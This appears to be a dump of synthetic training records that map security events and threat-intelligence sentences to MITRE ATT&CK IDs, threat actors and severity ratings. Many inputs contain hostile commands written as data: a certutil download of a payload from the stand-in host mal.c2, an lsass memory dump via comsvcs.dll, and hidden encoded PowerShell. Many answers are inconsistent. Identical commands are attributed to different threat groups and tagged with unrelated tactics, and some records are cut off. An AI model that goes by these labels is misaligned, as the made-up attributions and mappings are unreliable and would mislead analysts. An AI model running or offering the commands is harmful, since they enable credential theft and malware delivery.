messages
listlengths
2
2
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BlackMould can run cmd.exe with parameters.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.52.116.203", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-6AGZDNGQR8)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Initial Access, Privilege Escalation", "role": "user" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Orz can gather the victim's Internet Explorer version.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.152.176.87", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-OF3GZV7TKK)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection, Command and Control, Execution", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-9RLW6SC8V0)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control, Discovery", "role": "user" }, { "content": "{\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cannon can gather system information from the victim’s machine such as the OS version, machine name, and drive information.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-3VTR5D7HWR)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Exfiltration, Defense Evasion", "role": "user" }...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.183.127.18", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0008\", \"TA0043\"], \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor and investigate attempts to modify ACLs and file/directory ownership.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1222.002\", \"T1222\"]}", "role": "assistant" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ke3chang has obtained and used tools such as Mimikatz.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1588\", \"T1588.002\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.133.155.102", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0040\"], \"techniqu...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-668SHYUE3A)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BlackTech has used spearphishing e-mails with links to cloud services to deliver malware.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.002\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2113 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3998 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.171.41.5", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0002\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.18.222.253", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-ES310KM2XN)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The Launch Agent name may be disguised by using a name from the related operating system or benign software.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.001\", \"T1543\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3650 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.118.55.136", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA000...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: KGH_SPY can perform keylogging by polling the GetAsyncKeyState() function.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}", "role": "as...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ensure containers are not running as root by default.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0004\"], \"techniques\": [\"T1609\", \"T1611\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.130.92.218", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1530 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.41.11.56", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0001\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2696 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.85.156.22", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: DarkWatchman can query the Registry to determine if it has already been installed on the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"]}", "role": "assista...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.162.218.174", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-Q1ZZ3LTA2A)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\": \"C...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SMOKEDHAM has added created user accounts to local Admin groups.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for suspicious use of gpresult.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1615\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications.", "role": "user" ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.120.203.244", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0040\"], \"technique...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2831 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.50.245.188", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Derusbi gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.", "role": "user" }, { "content": "{\"tactics\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-0V4CQGT6FA)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Impact", "role": "user" }, { "content": "{\"sever...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3728 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.108.94.108", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techni...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-L85RA8ONNH)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Impact, Privilege Escalation", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: LightNeuron encrypts its configuration files with AES-256.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Filters are implemented as DLLs containing a method to validate potential passwords against password policies.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556.0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-Z2W15D38FA)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Persistence, Exfiltration", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2304 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.102.209.228", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0008\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3323 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-T6Z5JZIS6F)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.14.147.170", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1566...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-3B9TB7HLVS)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"se...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1467 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1030 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.155.157.217", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2068 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.131.210.115", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0006\"], \"techniques\": [...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2444 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.144.10.105", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"]...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2531 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.95.249.56", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1021.006...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-9TVGMOL9IK)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"],...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-L6SR63H4L3)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Credential Access, Reconnaissance", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-FCAYOWEAAD)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Credential Access, Persistence, Execution", "role": "user" }, { "...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.88.3.114", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0043\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3176 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.182.218.86", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: APT3 has a tool that can enumerate the permissions associated with Windows groups.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-YQWOZSC3F6)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Reconnaissance, Command and Control", "role": "user...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2120 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: nltest /domain_trusts", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2684 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.96.174.195", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-PHXQ6N0BMB)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Command and Control, Privilege Escalation", "role": ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and on...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.163.124.37", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2721 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.105.95.81", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 786 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.89.111.217", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2494 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"conf...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": \"Hi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-XE9Z0RL21G)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Cr...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-PMYNITU3T2)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"s...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1967 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: NanHaiShu can gather information about the victim proxy server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-J3S6VKGMF7)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.", "role": "user" }, { "content": "{\"tactics\": [\"TA004...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-AXH4JEU29G)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Initial Access, Command and Control", "role": "user"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:  [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com VBScript #2 “msht...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2842 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1852 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Kinsing has created and run a Bitcoin cryptocurrency miner.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1496\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: User file association preferences are stored under [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT].", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...